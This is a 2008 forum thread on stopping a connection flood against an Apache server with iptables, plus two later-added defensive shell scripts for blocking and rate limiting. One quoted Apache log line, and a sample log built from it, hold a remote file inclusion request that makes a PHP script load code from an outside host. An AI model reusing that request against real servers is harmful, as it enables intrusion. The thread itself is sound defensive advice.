Iptables to Manage web-Attacks [Linux Expert] - Linux


Thread: Iptables to Manage web-Attacks [Linux Expert]

  1. Iptables to Manage web-Attacks [Linux Expert]


    Paris,
    16 Feb 2008,

    Dear all,

    Know how to manage iptables?

    The point is we have a WS that is receiving tons of abnormal IPs that are
    connecting at a rapid pace.

    We try to believe that our hosting house (Affinity) are true
    professionals: much better than we are.

    We do not know why, but for 7 days someone has been destroying everything by
    launching tons of connections: the problem is Apache is getting overloaded
    with requests until the server runs out of memory and crashes.
    For sure our USD 1.10 EBITDA / day loss-of-time company is worth these
    attacks.

    The hosting experts enabled syn-cookies, modified Apache timeouts and
    Server-Pool Size Regulation, and blocked IPs in iptables.

    I went through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
    line ("locate iptables") and edited files.

    I could not figure out where the IPs are listed and added to the
    definition list.

    Nothing in:
    /var/lock/subsys/iptables
    /etc/sysconfig/iptables-config
    /lib/iptables
    /etc/sysconfig/iptables
    /sbin/iptables

    Do you know the name and location of the file that includes the list of
    blocked IPs?

    Many thanks and regards in advance for your advice.
    cougloff




  2. Re: Iptables to Manage web-Attacks [Linux Expert]

    On Sat, 16 Feb 2008 10:58:48 -0800, Pseudonyme rearranged some electrons
    to say:

    > Paris,
    > 16 Feb 2008,
    >
    > Dear all,
    >
    > Know how to manage iptables?
    >
    > The point is we have a WS that is receiving tons of abnormal IPs that are
    > connecting at a rapid pace.
    >
    > We try to believe that our hosting house (Affinity) are true
    > professionals: much better than we are.
    >
    > We do not know why, but for 7 days someone has been destroying everything by
    > launching tons of connections: the problem is Apache is getting overloaded
    > with requests until the server runs out of memory and crashes. For sure our
    > USD 1.10 EBITDA / day loss-of-time company is worth these attacks.
    >
    > The hosting experts enabled syn-cookies, modified Apache timeouts and
    > Server-Pool Size Regulation, and blocked IPs in iptables.
    >
    > I went through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
    > line ("locate iptables") and edited files.
    >
    > I could not figure out where the IPs are listed and added to the
    > definition list.
    >
    > Nothing in:
    > /var/lock/subsys/iptables
    > /etc/sysconfig/iptables-config
    > /lib/iptables
    > /etc/sysconfig/iptables
    > /sbin/iptables
    >
    > Do you know the name and location of the file that includes the list of
    > blocked IPs?
    >
    > Many thanks and regards in advance for your advice. cougloff


    You could use tcp wrappers:
    man tcpd

  4. Re: Iptables to Manage web-Attacks [Linux Expert]

    On a sunny day (Sat, 16 Feb 2008 10:58:48 -0800 (PST)) it happened Pseudonyme
    wrote in
    :

    > I went through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
    > line ("locate iptables") and edited files.
    >
    > I could not figure out where the IPs are listed and added to the
    > definition list.
    >
    > Nothing in:
    > /var/lock/subsys/iptables
    > /etc/sysconfig/iptables-config
    > /lib/iptables
    > /etc/sysconfig/iptables
    > /sbin/iptables
    >
    > Do you know the name and location of the file that includes the list of
    > blocked IPs?
    >
    > Many thanks and regards in advance for your advice.
    > cougloff


    I use iptables for this, but of course in my own way ;-)

    I have a script, which I run as root:
    ----------------------------------------------------
    #!/bin/sh
    # This is called to add an input deny for an IP address to iptables,
    # and save the configuration.

    if [ "$1" = "" ]
    then
        echo "Usage: reject IP_address"
        exit 1
    fi
    # Drop everything arriving from the address...
    iptables -A INPUT -s "$1" -p all -j DROP
    # ...and refuse anything we would send back to it (OUTPUT matches on -d,
    # the destination; a -s match would never fire on outbound packets).
    iptables -A OUTPUT -d "$1" -p all -j REJECT

    # Persist the whole rule set so iptables-restore can reload it at boot.
    iptables-save > /root/firewall

    exit 0
    --------------------------------------------------


    For example, if I see something like this in the Apache log:
    83.137.193.66 www.stockguard.nl - - [15/Feb/2008:20:27:49 +0100] "GET /panteltje/fpga//cp2.php?securelib=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 887
    then, even though the bad guy got a 404, I do:
    reject 83.137.193.66
    and he will never find my server again, or get any response from it, as the nameserver is also here.

    You will see from the above script that you can make your own list with:

    iptables-save > /path_to/yourtables


    There is also an iptables-restore, to initialize at power up:
    /sbin/iptables-restore < /path_to/yourtables

    You can flush with
    iptables -F

    or list all entries (takes a long time as it does nslookup) with
    iptables -L
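
    A hardened take on the reject script above, added here as an example and not the poster's own script: it validates the address before anything reaches iptables, skips a rule that already exists, inserts at the top of the chain so an earlier ACCEPT cannot shadow it, and persists with iptables-save for an iptables-restore at boot. SAVE_FILE, DRY_RUN and the function names are my own assumptions; DRY_RUN=1 prints the commands instead of running them, so it can be previewed without root.

```shell
#!/bin/sh
# reject: block one IPv4 address with iptables and persist the rule set.
# Assumptions (mine, not the poster's): rules are saved to SAVE_FILE and
# reloaded at boot with "iptables-restore < $SAVE_FILE"; DRY_RUN=1 prints
# the iptables commands instead of executing them, so it runs without root.
SAVE_FILE="${SAVE_FILE:-/root/firewall}"

# valid_ipv4 ADDR: true only for four dot-separated decimal octets, each 0-255.
# This keeps a typo or a stray shell metacharacter from reaching iptables.
valid_ipv4() {
    case "$1" in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    _ifs=$IFS; IFS=.
    set -- $1
    IFS=$_ifs
    [ $# -eq 4 ] || return 1
    for _octet in "$@"; do
        [ ${#_octet} -le 3 ] && [ "$_octet" -le 255 ] || return 1
    done
    return 0
}

# run CMD...: execute, or just echo the command line under DRY_RUN=1.
run() {
    if [ "${DRY_RUN:-0}" = 1 ]; then echo "$*"; else "$@"; fi
}

# block_ip ADDR: drop inbound traffic from ADDR and refuse replies to it,
# then save the whole rule set. Returns 2 on a malformed address.
block_ip() {
    valid_ipv4 "$1" || { echo "reject: '$1' is not an IPv4 address" >&2; return 2; }
    # -C tests for an identical rule, so re-running does not pile up duplicates.
    if [ "${DRY_RUN:-0}" != 1 ] && iptables -C INPUT -s "$1" -j DROP 2>/dev/null; then
        echo "reject: $1 is already blocked"
        return 0
    fi
    # -I puts the rule first so an earlier ACCEPT in the chain cannot shadow it;
    # OUTPUT matches on -d (destination), which is what stops the replies.
    run iptables -I INPUT -s "$1" -j DROP
    run iptables -I OUTPUT -d "$1" -j REJECT
    if [ "${DRY_RUN:-0}" = 1 ]; then
        echo "iptables-save > $SAVE_FILE"
    else
        iptables-save > "$SAVE_FILE"
    fi
}

# Usage: reject IP_address   (as root; DRY_RUN=1 reject IP_address to preview)
if [ $# -gt 0 ]; then
    block_ip "$1" || exit $?
fi
```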




  6. Re: Iptables to Manage web-Attacks [Linux Expert]

    Pseudonyme wrote:

    >
    > Paris,
    > 16 Feb 2008,
    >
    > Dear all,
    >
    > Know how to manage iptables?
    >
    > The point is we have a WS that is receiving tons of abnormal IPs that are
    > connecting at a rapid pace.
    >
    > We try to believe that our hosting house (Affinity) are true
    > professionals: much better than we are.
    >
    > We do not know why, but for 7 days someone has been destroying everything by
    > launching tons of connections: the problem is Apache is getting overloaded
    > with requests until the server runs out of memory and crashes.
    > For sure our USD 1.10 EBITDA / day loss-of-time company is worth these
    > attacks.
    >
    > The hosting experts enabled syn-cookies, modified Apache timeouts and
    > Server-Pool Size Regulation, and blocked IPs in iptables.
    >
    > I went through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
    > line ("locate iptables") and edited files.
    >
    > I could not figure out where the IPs are listed and added to the
    > definition list.
    >
    > Nothing in:
    > /var/lock/subsys/iptables
    > /etc/sysconfig/iptables-config
    > /lib/iptables
    > /etc/sysconfig/iptables
    > /sbin/iptables
    >
    > Do you know the name and location of the file that includes the list of
    > blocked IPs?
    >
    > Many thanks and regards in advance for your advice.
    > cougloff


    When you find it, why not post it? Makes for good reading...


    --

    Jerry McBride (jmcbride@mail-on.us)

  8. Re: Iptables to Manage web-Attacks [Linux Expert]

    Pseudonyme wrote:

    > Know how to manage iptables?


    This depends on which "firewall" you are using to generate the iptables rules.


    > I went through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
    > line ("locate iptables") and edited files.
    >
    > I could not figure out where the IPs are listed and added to the
    > definition list.
    >
    > Do you know the name and location of the file that includes the list of
    > blocked IPs?


    Use iptables to add a new rule (see the manual page for iptables or visit
    www.iptables.org) and then use the iptables save feature to store the data for
    next restart.


    --

    //Aho

  10. Re: Iptables to Manage web-Attacks [Linux Expert]

    On 16 Feb, 19:58, Pseudonyme wrote:
    > Paris,
    > 16 Feb 2008,
    >
    > Dear all,
    >
    > Know how to manage iptables?
    >
    > The point is we have a WS that is receiving tons of abnormal IPs that are
    > connecting at a rapid pace.
    >
    > We try to believe that our hosting house (Affinity) are true
    > professionals: much better than we are.
    >
    > We do not know why, but for 7 days someone has been destroying everything by
    > launching tons of connections: the problem is Apache is getting overloaded
    > with requests until the server runs out of memory and crashes.
    > For sure our USD 1.10 EBITDA / day loss-of-time company is worth these
    > attacks.
    >
    > The hosting experts enabled syn-cookies, modified Apache timeouts and
    > Server-Pool Size Regulation, and blocked IPs in iptables.
    >
    > I went through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
    > line ("locate iptables") and edited files.
    >
    > I could not figure out where the IPs are listed and added to the
    > definition list.
    >
    > Nothing in:
    > /var/lock/subsys/iptables
    > /etc/sysconfig/iptables-config
    > /lib/iptables
    > /etc/sysconfig/iptables
    > /sbin/iptables
    >
    > Do you know the name and location of the file that includes the list of
    > blocked IPs?
    >
    > Many thanks and regards in advance for your advice.
    > cougloff


    If you want, you can use the graphic tool system-config-firewall; it
    does a good job...

  12. Re: Iptables to Manage web-Attacks [Linux Expert]

    On Sat, 16 Feb 2008 10:58:48 -0800, Pseudonyme wrote:

    > We do not know why, but for 7 days someone has been destroying everything by
    > launching tons of connections: the problem is Apache is getting overloaded
    > with requests until the server runs out of memory and crashes. For sure our
    > USD 1.10 EBITDA / day loss-of-time company is worth these attacks.


    Perhaps blocking more than N connections per time unit from any IP
    address? This could block quick legitimate accesses, but it might also
    block what appear to be DOS attacks.

    iptables can do this. See the "hashlimit" module.

    This will only work if there are many connections from a given IP. If
    the attack is sufficiently distributed, this will block too much
    legitimate traffic before helping with the attacks. But if you're trying
    to block individual IPs, then perhaps the attack is not terribly
    distributed.

    - Andrew

  14. Re: Iptables to Manage web-Attacks [Linux Expert]

    On Sat, 16 Feb 2008 10:58:48 -0800, Pseudonyme wrote:
    >
    > We do not know why, but for 7 days someone has been destroying everything by
    > launching tons of connections: the problem is Apache is getting overloaded
    > with requests until the server runs out of memory and crashes. For sure our
    > USD 1.10 EBITDA / day loss-of-time company is worth these attacks.



    Have you thought of putting in a reverse cache server and putting in a
    redirect for the page(s) they are requesting?
    Then the cache will respond much faster while the existing server can take
    care of the redirected traffic, which the "attacker" probably won't follow as
    it's unlikely they are actually looking at the response or even waiting for
    it.
    You may even be able to do this on a hosted server so that the attacks never
    arrive at your physical site.
    You may have to change the redirects if the attacker decides to follow you
    about to your original server, but it's better than nothing, and the host
    provider probably has experience of stopping these attacks using filters and
    they have the bandwidth to do it, which you probably don't.



  16. Re: Iptables to Manage web-Attacks [Linux Expert]

    Hi, I think this is what you want:

    This rule is for SYN packets, but you can modify it to fit your needs:

    iptables -t mangle -I PREROUTING -p tcp --syn --match hashlimit --hashlimit-name sins --hashlimit 50/s --hashlimit-mode srcip --hashlimit-htable-max 524288 -j ACCEPT
    iptables -t mangle -A PREROUTING -p tcp --syn -j DROP
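
    Andrew's per-source connection threshold and the hashlimit rules above, worked through as an added example that is mine and not from anyone in the thread: it counts requests per client over a few constructed Apache combined-log lines to spot a single-source flood, then prints the equivalent kernel-side limit as a hashlimit chain in the filter table, where accepted traffic still passes the rest of INPUT instead of being short-circuited in mangle/PREROUTING. The function names, the HTTP_LIMIT chain, the documentation addresses in the sample and the 20/sec and 40-burst figures are my own choices.

```shell
#!/bin/sh
# Detect single-source request floods in an Apache access log and express the
# same per-source threshold as an iptables hashlimit rule set.
# Assumes the standard "combined" log format, where field 1 is the client IP.

# Constructed sample (documentation addresses, not real traffic): 192.0.2.10
# hammers one PHP URL while two other clients browse normally.
SAMPLE_LOG='192.0.2.10 - - [16/Feb/2008:10:58:01 +0000] "GET /cp2.php?securelib=http://example.invalid/id.txt HTTP/1.1" 404 887 "-" "-"
198.51.100.7 - - [16/Feb/2008:10:58:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [16/Feb/2008:10:58:01 +0000] "GET /cp2.php?securelib=http://example.invalid/id.txt HTTP/1.1" 404 887 "-" "-"
192.0.2.10 - - [16/Feb/2008:10:58:02 +0000] "GET /cp2.php?securelib=http://example.invalid/id.txt HTTP/1.1" 404 887 "-" "-"
203.0.113.5 - - [16/Feb/2008:10:58:02 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.10 - - [16/Feb/2008:10:58:02 +0000] "GET /cp2.php?securelib=http://example.invalid/id.txt HTTP/1.1" 404 887 "-" "-"'

# requests_per_ip: reads log lines on stdin, prints "<count> <ip>" per source,
# busiest first.
requests_per_ip() {
    awk '{ n[$1]++ } END { for (ip in n) print n[ip], ip }' | sort -rn
}

# offenders THRESHOLD: prints the IPs with at least THRESHOLD requests in the
# input. Feed it a time slice of the log (e.g. the last minute) so that the
# threshold actually means "per minute".
offenders() {
    requests_per_ip | awk -v t="$1" '$1 >= t { print $2 }'
}

# rate_limit_rules RATE BURST: prints the iptables commands that enforce the
# same idea in the kernel. New HTTP connections from one source above RATE
# (after BURST is used up) are dropped; everything else RETURNs to INPUT and
# is still subject to the rest of the filter policy.
rate_limit_rules() {
    cat <<EOF
iptables -N HTTP_LIMIT
iptables -A INPUT -p tcp --dport 80 --syn -j HTTP_LIMIT
iptables -A HTTP_LIMIT -m hashlimit --hashlimit-name http --hashlimit-mode srcip --hashlimit-above $1 --hashlimit-burst $2 -j DROP
iptables -A HTTP_LIMIT -j RETURN
EOF
}

# Usage: count the sample, flag sources with >= 3 hits, show the rule set.
printf '%s\n' "$SAMPLE_LOG" | requests_per_ip
printf '%s\n' "$SAMPLE_LOG" | offenders 3
rate_limit_rules 20/sec 40
```

    As Andrew notes, a per-source limit only helps when the flood comes from few addresses; the offenders list makes that visible before any rule is loaded.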
